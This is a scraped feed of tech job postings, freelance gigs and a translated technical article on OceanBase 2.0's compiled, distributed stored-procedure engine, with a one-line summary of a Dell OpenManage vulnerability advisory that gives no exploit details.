of different software development models with emphasis on iterative approaches such as Agile; and experience with Linux user, basic shell programming **What's In It for You** - Vacation/PTO - Medical - Dental - Vision - Relocation - Bonus - 401k So, if you are a Java Engineer (Mid-level to Senior) with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Java Engineer* *VA-Reston* *JG2-1493046*
          (USA-CO-Boulder) Full Stack Engineer      Cache   Translate Page      
Full Stack Engineer Full Stack Engineer - Skills Required - Ruby On Rails, JSON APIs, HTML, CSS, JavaScript, MySQL, PostfreSQL, ORM, Python, GIT If you are a Full Stack Engineer with experience, please read on! Based in Boulder, we are an agricultural company that provides commercial growers and agronomists with real-time insight and intelligence necessary to enhance farming efficiencies and increase profitability through drone technology. Due to growth, we are seeking a skilled Full stack Engineer to add to our team. If you are interested in hearing more, apply now! **What You Need for this Position** - Ruby On Rails (preferred) or Python - JSON APIs - HTML - CSS - JavaScript - MySQL or PostgreSQL - Docker or some other virtualization technology Nice to have: - Leaflet, Mapbox, Geoserver - GIT **What's In It for You** - Competitive salary - Vacation/PTO - Medical - Dental - Vision - 401k - Company perks and more! So, if you are a Full Stack Engineer with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Full Stack Engineer* *CO-Boulder* *CG3-1492741*
          (USA-MA-Billerica) Principal Database Administrator - MS SQL      Cache   Translate Page      
Principal Database Administrator - MS SQL Principal Database Administrator - MS SQL - Skills Required - SQL Server 2016, T-SQL, Business Continuity, AlwaysOn, Performance Tuning, Amazon Web Services, Oracle, MySQL, PostgreSQL, Visual Studio Title: Principal Database Administrator Compensation: up to $145K + Bonus + excellent benefits Location: Billerica, MA Specialties: SQL Server 2016, AlwaysOn, Business Continuity, and Performance Testing, Oracle, T-SQL, AWS Located in the beautiful town of Billerica - just outside of Boston, MA - we are a leading security and identity solutions company that leverages artificial intelligence, biometrics, and cryptography to provide faster, more accurate, and more reliable identity solutions for our customers. With 60 years of experience working for the US National Security and Public Safety communities, we've learned to utilize our technologies and innovations to ensure that, at the end of the day, only you can be you. Currently we are looking for a Principal Database Engineer to join our team. The ideal candidate has at least 10 years of SQL Server Admin experience, with hands-on knowledge of SQL Server 2016. Experience with AlwaysOn, Business Continuity, and Performance Testing is required, as is experience with T-SQL and Amazon Web Services. Non-Microsoft database experience is helpful (Oracle, PostgreSQL, MySql), as is DevOps and Visual Studio experience. Advanced Microsoft certifications would also be a huge plus. If this sounds like a match for you, apply today or send your resume directly to ben.bosworth@cybercoders.com! We are actively interviewing this week and next week. **What You Will Be Doing** - Provide deep technical knowledge and leadership to a team responsible for the support of Microsoft SQL Server databases. - Update, backup, maintain & troubleshoot databases. Perform troubleshooting, resolution and root cause analysis for database and application specific incidents. - Creates processes and procedures to minimize any potential downtime scenarios. - Creates standards for SQL Server database administration that supports the use of optimal database server resources and performance. - Serve as primary escalation point for critical database issues related to core systems and applications. - Analyze large, complex systems to determine performance bottlenecks, application bugs, and opportunities to improve efficiency. **What You Need for this Position** 1.) 10+ years of SQL Server administration experience is required. 2.) Solid knowledge of AlwaysOn, Business Continuity, and Performance Testing. 3.) Experience working with Amazon Web Services. 4.) Strong knowledge of T-SQL. 5.) B.S./M.S. in CS, IS, CpE or EE Nice to have, but not required: 1.) Experience with Non Microsoft database technologies (Oracle, PostgreSQL, MySql) 2.) Advanced Microsoft certifications (MCSA, MCSE) **What's In It for You** - Competitive salary (up to $145K, DOE) + Bonus - Excellent benefits package - Vacation/PTO - Medical, Dental, Vision - 401K Matching - A fun, team-oriented working environment where hard work is recognized and rewarded. So, if you are an experienced Database Administrator in Billerica, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. 
**Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Principal Database Administrator - MS SQL* *MA-Billerica* *BB11-1493024*
          (USA-FL-Orlando) PHP Web Developer - Mid level      Cache   Translate Page      
PHP Web Developer - Mid level PHP Web Developer - Mid level - Skills Required - PHP, LAMP Stack, Web Application Development, Laravel If you are a PHP Developer with 3+ years of web application development experience, please read on! Based in Orlando, FL - We're a FAST growing, very profitable retail company offering a variety of products & services all over the country. Our company has over 400 locations across the country with our corporate headquarters being in downtown Orlando! We landed a brand new program and need PHP Developers to come on board who want to work with the latest tech on NEW projects & development. --If interested and qualified, please apply and include any links to work/code samples to have priority!-- **Top Reasons to Work with Us** - We pride ourselves on our upbeat and collaborative culture. - We're offering a great starting comp package including base salary + benefits + PTO + more! - You'll be working with the latest technologies like Laravel, AWS, and more. **What You Will Be Doing** - Handling API to APi integrations & Core Processes - Working on new projects in a LAMP stack environment, using Laravel! - 80% new development & 20% maintenance. - Collaborating with lead engineers, Director of Development, QA, and design team on best practices. **What You Need for this Position** Must Have: - 3+ years of PHP experience on backend applications - MySQL experience - Modern programming techniques (OOp, unit testing, etc) - MVC framework experience - API Implementation experience Preferred: - Experience with Laravel This is a great, long term career opportunity with tons of career growth. Don't miss out on it! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *PHP Web Developer - Mid level* *FL-Orlando* *AP3-1493002*
          2.0 Analysis Series | OceanBase 2.0 - the first native distributed database to support stored procedures      Cache   Translate Page      

OB Jun: This is the eighth article in the "OceanBase 2.0 Technical Analysis Series". Today we talk about the most distinctive new feature of the 2.0 release, the one that cannot go unmentioned: stored procedures. Among the small number of native distributed databases, OceanBase 2.0 is the first product to support stored procedures. This article analyzes the functionality and the implementation of stored procedures in 2.0 in depth. For more of this series, follow the OceanBase public account and subscribe!

Introduction

PL/SQL (the stored procedure language) is a programming language, a procedural extension of SQL (Procedural Language/SQL) that evolved from the Ada language. PL/SQL is the relational database's extension of the SQL language: it adds programming-language features on top of ordinary SQL statements, organizes data manipulation and query statements inside procedural PL/SQL code, and implements complex functionality through logic such as conditionals and loops.

With PL/SQL you can write programs with many advanced capabilities, encapsulate business logic inside the database, obtain better abstraction and security, reduce network interaction, and make calls faster, which improves overall performance.

Today almost all commercial databases and open-source products support some form of PL, but the standards they follow differ. The most widely used is Oracle's PL/SQL, first released in 1989, with syntax based on Ada.

Besides that there are SQL Server's T-SQL, PostgreSQL's PL/pgSQL, and others. SQL/PSM (SQL/Persistent Stored Modules) in the SQL standard defines the PL used in stored procedures, but Oracle's PL/SQL has become the de facto standard. MySQL adopted the SQL/PSM standard, though not with 100% compatibility. The PL in OceanBase 2.0 is primarily MySQL compatible, and features that MySQL lacks are implemented by following Oracle.

MySQL's and PostgreSQL's PL are both interpreted. From an implementation point of view, interpretation is easier to build than compilation and easier to control, but, as one would expect, interpreted execution performs worse than compiled execution.

Before 9.x, Oracle's PL was also interpreted (Interpreted Compilation). Starting with 9.x Oracle provided Native Compilation: the SQL/PL is first translated into C code, a C compiler then compiles it into machine code, the compiled program is stored in a dynamic link library, and at run time the executor loads and calls the compiled functions in that library directly.

According to Oracle's own documentation, compiled programs run 1.05 to 2.4 times faster than interpreted ones; the actual gain depends on the characteristics of the program. Because the SQL statements themselves are still interpreted, the improvement is significant when the bulk of the PL is control logic and insignificant when the bulk of the PL is SQL statements. In addition, Oracle's PL debugging only supports interpreted execution.

Compiled execution is the trend: besides PL, many databases are trying to rewrite their SQL engines for compiled execution, including MemSQL, HANA and PostgreSQL. OceanBase's PL is compiled: it uses LLVM to generate native code and loads the machine code directly into the code segment for execution, with no dependency on an external C compiler or on generating dynamic link libraries.

Whether interpreted or compiled, today's commercial databases support PL only on a single machine. OceanBase supports the complete PL/SQL feature set in a relational database in a distributed environment, a first in the industry.
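As a concrete illustration (a sketch added for this translation, not part of the original article): in OceanBase's MySQL-compatible mode a stored procedure mixes control flow and SQL exactly as it would on MySQL. The procedure, table and column names below are made up for the example.

    DELIMITER //
    -- Credit interest to an account, but only if the balance is positive.
    CREATE PROCEDURE pay_interest(IN p_account_id BIGINT, IN p_rate DECIMAL(6,4))
    BEGIN
      DECLARE v_balance DECIMAL(16,2);

      SELECT balance INTO v_balance
        FROM accounts
       WHERE account_id = p_account_id;

      IF v_balance > 0 THEN
        UPDATE accounts
           SET balance = balance + v_balance * p_rate
         WHERE account_id = p_account_id;
      END IF;
    END //
    DELIMITER ;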

Value and Significance

1. Lower response time (RT)

The most direct value of PL for a business application is lower RT. Suppose one complete execution path of a piece of business logic averages 200 SQL statements, that is, the application talks to the database 200 times. Within the same data center each network interaction costs roughly 0.5 ms, so eliminating those 200 interactions saves about 100 ms of RT. Of course, because the application has its own logic, not all of it can be implemented in PL/SQL, so the 200 interactions cannot all be eliminated, but even cutting them in half gives an RT improvement of roughly 50 ms.
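A hedged sketch of what this looks like in practice (the table, column and procedure names are invented for the example): instead of the application issuing many individual statements over the network, the loop runs inside the database and the client pays for a single round trip, the CALL.

    DELIMITER //
    -- Settle every unsettled order in a batch inside the server.
    CREATE PROCEDURE settle_batch(IN p_batch_id BIGINT)
    BEGIN
      DECLARE done INT DEFAULT 0;
      DECLARE v_order_id BIGINT;
      DECLARE cur CURSOR FOR
        SELECT order_id FROM orders WHERE batch_id = p_batch_id AND settled = 0;
      DECLARE CONTINUE HANDLER FOR NOT FOUND SET done = 1;

      OPEN cur;
      settle_loop: LOOP
        FETCH cur INTO v_order_id;
        IF done = 1 THEN
          LEAVE settle_loop;
        END IF;
        UPDATE orders SET settled = 1 WHERE order_id = v_order_id;
        INSERT INTO settlement_log (order_id, batch_id)
        VALUES (v_order_id, p_batch_id);
      END LOOP;
      CLOSE cur;
    END //
    DELIMITER ;

    -- One network round trip from the application replaces the whole loop:
    CALL settle_batch(42);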

2. Resource savings

Besides lowering RT, reducing network interaction also directly reduces data transfer and network overhead. Suppose an Internet business spends on average 30% of its CPU on the network, that is, 30% of CPU goes to sending, receiving and parsing network traffic. Even if a few tens of milliseconds of RT look insignificant across the whole call chain, the machines saved by reclaiming that 30% of CPU are worth real money on the order of hundreds of millions, and converting those machine resources back into system processing capacity is just as striking.

3. Higher throughput

The network savings brought by PL/SQL are really only the surface. More fundamentally, because each transaction's RT shrinks, the time each transaction holds critical sections inside the database kernel shrinks as well, so the system's CPU utilization rises sharply and overall throughput rises with it. The effect is not limited to the database kernel; it helps the application's business logic too. The value of that gain in CPU utilization is likewise on the order of hundreds of millions.

4. Better stability and reliability

Today's distributed Internet businesses are mostly deployed in units: the application and the database sit in the same data center and, in most cases, all access stays within that data center. If a failure makes the data in one database inaccessible, OceanBase automatically switches to another replica and the application must switch with it; otherwise what used to be same-data-center database access becomes cross-data-center or even cross-city access, and the network cost per interaction grows from 0.5 ms to 2 ms, or even 7 ms to 30 ms. For a single statement that is nothing, but multiplied by a few hundred SQL statements it becomes considerable.

Such large network delays can seriously affect the whole business system and even drag it down. With PL/SQL these problems go away: the business is no longer tightly bound to the database, decoupling the application's computation from the database becomes possible, and the reliability of the whole system improves.

At the same time, OceanBase's design is relatively demanding on the network, and intra-cluster communication as well as internal workflow logic can also be implemented with PL/SQL. This not only makes internal communication more efficient, it also greatly simplifies the core code of the database kernel, reduces error paths, and improves stability.

Moreover, once part of the business logic is moved into PL, the application code shrinks and the development workflow becomes simpler, while gaining better abstraction and security.

Implementation

1. Architecture

Figure 1 shows the call relationships in which the OceanBase PL Engine operates. The PL engine (PL Engine) and the SQL engine (SQL Engine) can call each other: SQL can enter the PL engine directly, for example when a SQL statement uses a user-defined function, and the PL engine can access the SQL engine through the SPI interface, for example to evaluate expressions or execute SQL statements inside PL.

Figure 1: PL Engine call relationships

2. PL Engine

The PL Engine consists of six modules: Parser, Resolver, Code Generator, Compiler, Executor and PL Cache. The Parser, Resolver, Code Generator and Compiler form a complete PL compilation pipeline, as shown in Figure 2.

Parser

The syntax parser analyzes the PL syntax and produces a parse tree (ParseTree). The PL engine and the SQL engine each implement their own Parser, but the two avoid redundant work: a query string entering the observer is parsed by the PL Parser first, and if it turns out to be a SQL statement it is handed to the SQL engine for parsing.

Resolver

The Resolver performs semantic analysis, for example checking variable scopes and the schema of the data objects referenced by static SQL. It generates an AST structure for every PL statement plus a global FunctionAST structure. The FunctionAST stores the basic definition of the PL object together with the generated global symbol table, global label table, global exception table and so on, while the AST of each statement records the logical references into those global tables.

Code Generator

For interpreted execution the AST would be enough, but compiled execution requires a further translation step. Using the interfaces provided by LLVM, the AST is translated into IR intermediate code. The IR can be dumped in order to verify that the translation is correct.

Compiler

This step turns the IR into machine code through JIT compilation; its output is a PLFunction structure.

Executor

The PL executor takes the compiled PLFunction, builds the execution environment from the input parameters, invokes the function pointer and obtains the result.

PL Cache

The PL Cache exists to avoid recompiling a PL object on every call and thus to improve PL execution efficiency; anonymous blocks therefore have no need to be cached.

The PL Cache is a hash table that maps a Key (the ID of a procedure or function) to a Value (a PLFunction). The validity of a cached PLFunction is checked against the schema, and invalid entries are removed when they are found.

The PL Cache is an internal mechanism of the PL Engine. The PL Engine exposes a single interface for executing a procedure or function by ID, so callers do not need to care about the caching mechanism and simply execute PL through the PL Engine object.

Figure 2: PL Engine modules

The PL Engine looks up a compiled PLFunction in the PL Cache by ID and, if one is found, further checks whether its version is usable. If there is no usable PLFunction in the PL Cache, the compilation pipeline is invoked, the result is cached in the PL Cache, and it is handed to the Executor to run.

The final output of compilation is the memory address of a piece of binary code. The Executor casts that address to a function pointer and calls it with the execution parameters and the execution environment to obtain the result.

3. Compiled execution

The advantages of compiled over interpreted execution need no elaboration, and OceanBase also executes stored procedures by compiling them to machine code. Unlike Oracle, however, OceanBase uses JIT technology and does not depend on an external C compiler or on generating dynamic link libraries. This approach has the following advantages:

- The effect of compiled execution is obtained without having to study complex, architecture-specific machine-code generation; generating LLVM IR is much simpler than generating assembly and naturally brings cross-platform capability;
- LLVM's mature optimization modules all operate on LLVM IR, so improvements to the optimizer made in projects such as clang benefit us directly;
- Using JIT inside the observer to control the generated, compiled code directly is better in controllability, performance and maintainability than Oracle's approach of compiling with an external compiler and loading a dynamic link library;
- Compiled execution of PL can be combined with compiled execution of SQL expressions, some physical operators, or even entire query plans, improving overall performance.

Figure 3 shows the PL compilation workflow. The Parser, Resolver and Code Generator modules do the front-end work of the compiler, converting PL text into intermediate code (LLVM IR). The Compiler module does the pass and back-end work, optimizing the intermediate code through the pass pipeline and generating the actual machine code.

Figure 3: PL compilation workflow

With this architecture, the bulk of the work of implementing the PL/SQL language is in the front end, that is, the Parser, Resolver and Code Generator modules, while the Compiler can be implemented by calling the interfaces provided by LLVM.

兼容性

各大数据库支持的PL都各有不同。目前最广泛使用的Oracle PL/SQL语言最早在1989年发布,语法基于Ada语言。PostgreSQL的PL/pgSQL,SQL Server的T-SQL等语言都各不相同。SQL标准中的SQL/PSM (SQL/Persistent Stored Modules)定义了存储过程中使用的PL,但遗憾的是主流数据库厂商并没有全心支持。

像PL/pgSQL一样,MySQL采用了SQL/PSM标准,但是并非100%兼容。 OceanBase 提供MySQL和Oracle两种兼容模式,PL/SQL也同样既可以使用Mysql的用法,也可以选择Oracle兼容模式,基于Mysql或者Oracle的PL的代码可以一行不改的迁移到OceanBase运行。
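To make the compatibility claim concrete, here is an illustrative sketch (added for this translation) of the same trivial function written once in MySQL-style syntax and once in Oracle PL/SQL style; under the corresponding compatibility mode each form is intended to be accepted as-is. The function name and the tax rate are invented.

    -- MySQL-compatible mode
    DELIMITER //
    CREATE FUNCTION add_tax(p_amount DECIMAL(12,2)) RETURNS DECIMAL(12,2)
        DETERMINISTIC
    BEGIN
      RETURN p_amount * 1.06;
    END //
    DELIMITER ;

    -- Oracle-compatible mode (PL/SQL syntax)
    CREATE OR REPLACE FUNCTION add_tax(p_amount NUMBER) RETURN NUMBER IS
    BEGIN
      RETURN p_amount * 1.06;
    END;
    /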

Distributed execution

OceanBase's inherently distributed nature means that PL execution is distributed as well. A PL object is parsed, compiled and executed on one observer; when the PL needs to interact with SQL, it calls the SQL Engine through SPI and the SQL Engine executes the statement, and if that statement is distributed it is naturally executed in a distributed fashion.

OceanBase chooses the node that holds the data of the first table accessed by the stored procedure to compile and execute the PL, so that as much of the PL's data access as possible is local. If the node holding the accessed data cannot be determined, a node is chosen at random.

When a distributed SQL statement calls a PL function, the function may be compiled and executed on several observers; each observer is guaranteed to compile it under the same environment parameters, so the compiled PL behaves identically everywhere.

Debugging

Debugging is a basic requirement for a programming language, so a PL/SQL implementation that cannot be debugged, like MySQL's, does not really have the foundation for large-scale use.

Existing PL implementations in the industry only support debugging in interpreted mode; Oracle's compiled mode does not support debugging. OceanBase has only one mode, compiled execution, and supports debugging in that mode, in a distributed environment. The debugging features supported so far include setting breakpoints (b), listing breakpoints (info b), printing variables (p), printing the stack (bt), single-stepping (s), stepping into a function (s), continuing (c) and so on. Communication works in a way similar to Oracle's: one database connection is established to debug another connection, debug commands are plain text rather than a newly invented wire protocol, and the interface is exposed in the form of packages.

Distributed debugging is the hard part of implementing PL/SQL in a distributed environment: when PL executes in a distributed fashion, the user's debug session connects to one of the nodes, and that node must establish debug connections to the other executing nodes and relay commands and data.

MySQL has no packages (Package). OceanBase provides a package mechanism fully compatible with Oracle's, so packages created by users on Oracle can be created and run on OceanBase without changing a single line.

However, OceanBase does not yet support all of Oracle's system packages, and completing them is part of our work for the coming period. With the basic PL/SQL capability and the package mechanism in place, the remaining system packages can be implemented quickly as needed.

Summary and outlook

From the day OceanBase was born, the team's goal was never to build a database just for our own use, but to build a general-purpose database that truly pushes society forward and changes its productivity.

As Ant Financial opens up its technology, OceanBase has begun to serve external customers. Many customers in the financial industry built a large part of their business on Oracle and made heavy use of PL/SQL, a situation that is even more common outside finance, and this has become the most important chain with which Oracle ties itself to customers. For OceanBase to offer customers a more reliable and more cost-effective service than Oracle, PL/SQL is a threshold that has to be crossed. It is a hard threshold to cross, but once crossed it becomes an important advantage for OceanBase.

On the other hand, although Internet companies today generally do not use PL/SQL for business development, its enormous value to the business is hard to deny. PL not only lowers RT, raises resource utilization and improves system throughput, stability and reliability, it is also an important foundation for serving customers, especially customers from traditional industries. In this respect Ant Financial is ahead of the Internet industry and has already started to use the strengths of PL/SQL internally to solve business problems.

OceanBase provides PL/SQL that is compatible with both MySQL and Oracle modes and implements its compiled-execution kernel engine with LLVM, bringing the performance of the PL control logic itself to a level comparable with Oracle. OceanBase is also the industry's first commercial product to support truly distributed PL, with a complete and compatible debugging mechanism. In addition, OceanBase provides a complete package mechanism.

In the future, besides completing the Oracle-compatible system packages, we need to keep optimizing PL/SQL performance. At the same time we will promote the use of PL/SQL in more internal businesses to create value for them, and accumulate the technology and polish the product before offering it to external customers.

Join the OceanBase 2.0 technical discussion group

- Want to learn more about the new features of OceanBase 2.0?

- Want to talk in depth with Ant Financial's front-line OceanBase technical experts?

Scan the QR code in the original post to contact the editor and quickly join the OceanBase technical discussion group!

          (USA-CA-San Diego) Systems Integration Engineer      Cache   Translate Page      
**Job Description** The Customer Technical Solutions team at Advanced GEOINT Systems (AGS) provides on-site installation, customization, support and training for the various GXP Platform, desktop and mobile products in environments ranging from traditional desktop to cloud based implementations. You will be required to conduct software demonstrations at trade shows, conferences and customer sites.You will also be responsible for providing incident management, problem management, and technical support for the customer environments while working closely with internal and external customers, internal support personnel, product testing, and engineering. As a member of the Customer Technical Solutions team, you will: + Work with members of our software support and test teams, product managers, and customers to integrate, configure, and apply intelligence processing, exploitation, and dissemination (PED) products. + Develop strong relationships with key customer technical personnel to ensure customer satisfaction and grow our business. + Become an expert in configuring and applying our products and provide customer feedback to product managers and the development teams. + Assist with training material development. **About GXP:** The Geospatial eXploitation Products (GXP) business provides licensed software capabilities and geospatial technology R&D. GXP s ability to draw on internal data production and technology expertise has allowed it to deliver superior products to the user community. GXP often finds ways to improve software implementation through user conferences and regional workshops, where important feedback and insight is gathered from customers. GXP commercial software, GXP Xplorer, GXP WebView, SOCET GXP, and SOCET SET provide customers with comprehensive image and video analysis, data management and geospatial production capabilities, andstate-of-the art sensor-data processing and analytics technologies, providing compact and scalable solutions to challenging problems in areas of video analytics, sensor data processing, computer vision, and machine learning. These products serve government and civil customers needs for photogrammetry, mapping, GIS, image exploitation, precision targeting, GEOINT (geospatial intelligence), MOVINT (movement intelligence), 3-D visualization, simulation and mission planning. **Culture characteristics:** + Treating customers, fellow employees, stakeholders, and partners with respect and dignity at all times. + Shows sincere commitment and adherence to all Corporate Compliance issues. + Humble attitude about knowledge limitations, know when to ask for help. + Ability to knowledge-share among team members, across partnered functions and the customer so that cases can continue with the utmost drive to a solution. + Have your peers' backs so that customers experience the same level of integrity regardless of whom they are working with. + Learn from one another. Take the time to learn a new product. + Demonstrate leadership in your actions. + Participating in maintaining an organized, clean, and safe work environment. + Self-discipline, the ability to prioritize tasks, and a detail-oriented working style. + Planning and managing projects without supervision. + Ability to learn from experience and informal instruction. + Adopt a strategy of continuous improvement. + In addition to having remarkable core IT skills, the Systems Integration Engineer must have customer focus in their DNA and do whatever it takes to achieve outstanding results for our customers. 
+ Have a positive attitude, self-motivation, and a results-oriented approach to business. **General daily responsibilities include:** Performing technical planning, system integration, verification and validation, evaluates alternatives including cost, risk, supportability and analyses for total systems. Analysis is performed at all levels of total system product to include concept, design, fabrication, test, installation, operation, maintenance and disposal. Ensuring the logical and systematic conversion of product requirements into total systems solutions. Translating customer requirements into hardware/software specifications.Responsibilities will include installation and testing our solutions within the customer environment, to include: back-end services, front-end services, web applications, mobile applications, and improving the overall quality of our products. You will be required to analyze, test and verify the implementation of the functional and non-functional requirements of a cloud-based distributed system. + Submit defect reports and enhancement requests via JIRA. + Participate in Product Test activities. + Collaboratively work with Customer Technical Solutions team to resolve or diagnose customer issues. + Provide problem management by taking ownership of repeating incidents, researching root cause and resolving problem. + Understanding, applying, and communicating the technology concepts and implementations of our products. + Participating as a customer advocate in the engineering development process. + Contributing to the development of customer support material such as technical manuals, application briefs, and product data sheets as needed. **Typical Education & Experience** Typically a Bachelor's Degree and 4 years work experience or equivalent experience **Required Skills and Education** **Required Skills and Education** Bachelor's degree in computer science, engineering or another related fieldor at least four years of additional experience in lieu of a degree. Strong analytical, problem solving, and debugging skills. + Excellent communication skills, both written and verbal. + Excellent attention to detail, design, and user experience awareness. + Ability to work well in a very dynamic, fast moving environment with high expectations. + Flexibility in adjusting to variable workload and job duties. + Ability to work independently and with little supervision. + Proficiency with virtual servers (HyperV and VMware). + Experience installing, running, and troubleshooting software in Windows. + Exceptional organizational and prioritization skills. + Strong problem solving and analytical skills to diagnose issues at system level, including Windows/Linux operating system, SQL Server, web services and application integration. + Software diagnosis and troubleshooting. + A valid passport and the ability to travel domestically or internationally. + U.S. CITIZENSHIP REQUIRED. Candidates selected for some positions will be subjected to a government security investigation and will need to meet eligibility requirements for access to classified information. **Preferred Skills and Education** + SOCET GXP + GXP Xplorer + GEOINT + GIS + AWS + CITRIX XenServer / XenDesktop + VMWare VSphere, Horizon + NVIDIA GRID + Comfortable with presentations and speaking in front of large groups. + Multi-source processing, exploitation, and dissemination workflows. + Experience in providing software technical support. 
+ Experience working with multiple OS types (Windows, Linux, OSX) and versions of SQL database configuration, optimization, and administration (MySQL, PostgreSQL). + Networking and networking protocols (TCP/IP, UDP, RDP). + Full-motion video (FMV) sensors, formats, codecs, and protocols. + Storage, retrieval, and streaming of video streams. + Programming in JavaScript, CSS, HTML, Python, and SQL. + Familiarity with OGC standards, such as WMS, WMTS, and WFS. **About BAE Systems Electronic Systems** BAE Systems is a premier global defense and security company with approximately 90,000 employees delivering a full range of products and services for air, land and naval forces, as well as advanced electronics, security, information technology solutions and customer support and services. The Electronic Systems (ES) sector spans the commercial and defense electronics markets with a broad portfolio of mission-critical electronic systems, including flight and engine controls; electronic warfare and night vision systems; surveillance and reconnaissance sensors; secure networked communications equipment; geospatial imagery intelligence products and systems; mission management; and power-and energy-management systems. Headquartered in Nashua, New Hampshire, ES employs approximately 13,000 people globally, with engineering and manufacturing functions primarily in the United States, United Kingdom, and Israel. Equal Opportunity Employer/Females/Minorities/Veterans/Disabled/Sexual Orientation/Gender Identity/Gender Expression **Systems Integration Engineer** **BAE1US21211** EEO Career Site Equal Opportunity Employer. Minorities . females . veterans . individuals with disabilities . sexual orientation . gender identity . gender expression
          Stripe expert for setting up and implementing Stripe connect with grouped transactions on a marketplace      Cache   Translate Page      
We are in the process of building a marketplace and have now come to the payment stage. We have chosen to go with Stripe and have an idea of how we want this to work; however, we lack the in-house experience to set this up properly... (Budget: $10 - $50 USD, Jobs: .NET, API, eCommerce, MySQL, Stripe)
          Dell OpenManage Network Manager 6.2.0.51 SP3 Privilege Escalation      Cache   Translate Page      
Dell OpenManage Network Manager exposes a MySQL listener that can be accessed with default credentials. This MySQL service is running as the root user, so an attacker can exploit this configuration to ... - Source: packetstormsecurity.com
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Question: MySQL table replication issue      Cache   Translate Page      
When setting up MySQL master-slave replication, the requirement is to replicate only two tables (say tables A and B) from two databases and nothing else. I set this up in the usual way; the key configuration is as follows. This does achieve table replication, but one case is problematic: if I create a table named X on the master, insert some data, and then rename X to B, the slave reports an error and cannot replicate table B. Could the experts please advise ...
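A hedged sketch of how such a filter is usually configured and of why the rename can break it; the schema name mydb and the staging table name X are assumptions for the example, not taken from the post.

    -- Replica-side filter, my.cnf style (illustrative):
    --   replicate-do-table = mydb.A
    --   replicate-do-table = mydb.B
    -- The same filter can be set online (MySQL 5.7+/8.0) while the SQL thread is stopped:
    STOP SLAVE SQL_THREAD;
    CHANGE REPLICATION FILTER REPLICATE_DO_TABLE = (mydb.A, mydb.B);
    START SLAVE SQL_THREAD;

    -- Likely cause of the reported error: CREATE TABLE X and INSERT INTO X are
    -- filtered out on the replica because X is not in the filter list, so when
    -- RENAME TABLE X TO B (or a later statement against B) is applied, the
    -- replica has no matching table and replication stops with an error.
    -- One workaround is to include the staging table in the filter as well:
    --   REPLICATE_DO_TABLE = (mydb.A, mydb.B, mydb.X)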
          magento 2 edits and api      Cache   Translate Page      
Hello, I moved my site from OpenCart to Magento 2 and ran into some issues and bugs that I want fixed. I also want an extension and an API installed. (Budget: $30 - $250 USD, Jobs: eCommerce, Magento, MySQL, PHP)
          PHP programmer from Kerala      Cache   Translate Page      
Looking for a senior PHP developer from Kerala who can work from home (Budget: $8 - $15 USD, Jobs: HTML, Javascript, MySQL, PHP, Software Architecture)
          PHP developers from Pakistan      Cache   Translate Page      
Need PHP web developers for a software project (Budget: $30 - $250 USD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          C# Developer      Cache   Translate Page      

A developer is needed for a permanent position in Almaty.

At least one year of work experience.

Salary range: from 150,000 KZT to 300,000 KZT net.

Responsibilities:

  • Software development;
  • Technical support of the system;
  • Writing accompanying technical documentation;
  • Web technologies: PHP, Java (JSP, Servlet, Spring), knowledge of the HTTP protocol; working with web services (SOAP); knowledge of JS, jQuery, CSS is a plus;
  • Working with technical documentation (APIs, administrator guides, deploying various systems from their documentation, etc.), including in English;
  • Testing and configuring software;
  • Traveling to the customer's site, working with the system's users;
  • Team work on software development.

Requirements:

  • Knowledge of C# Windows Forms applications; knowledge of C++ or Delphi is also welcome;
  • Knowledge of network technologies;
  • Knowledge of SQL and any DBMS (MSSQL, MySQL, PostgreSQL, Oracle);
  • Ability to work through integration documentation for various services;
  • English at the level of reading technical literature;
  • Stress tolerance, communication skills;
  • Desire to grow professionally;
  • Ability to learn;
  • Ability to work in a team.

          Technical Architect - Data Solutions - CDW - Milwaukee, WI      Cache   Translate Page      
Experience with Microsoft SQL, MySQL, Oracle, and other database technologies. Predictive analytics, Machine Learning and/or AI skills will be a plus....
From CDW - Sat, 03 Nov 2018 06:11:29 GMT - View all Milwaukee, WI jobs
          Technical Architect - Data Solutions - CDW - Madison, WI      Cache   Translate Page      
Experience with Microsoft SQL, MySQL, Oracle, and other database technologies. Predictive analytics, Machine Learning and/or AI skills will be a plus....
From CDW - Sat, 03 Nov 2018 06:11:29 GMT - View all Madison, WI jobs
          Software Engineer - Microsoft - Bellevue, WA      Cache   Translate Page      
Presentation, Application, Business, and Data layers) preferred. Database development experience with technologies like MS SQL, MySQL, or Oracle....
From Microsoft - Sun, 28 Oct 2018 21:34:20 GMT - View all Bellevue, WA jobs
          Electronic Signature Ecuador task      Cache   Translate Page      
Hello. PLEASE BID ONLY IF YOU ARE AN EXPERT in XAdES-BES electronic signatures for Ecuador's SRI, in PHP Zend Framework 3. Sending and receiving receipts to the SRI web services; the information is in Spanish ... you have to follow... (Budget: $200 - $255 CAD, Jobs: MySQL, PHP, Software Architecture, XML)
          RingCentral api help      Cache   Translate Page      
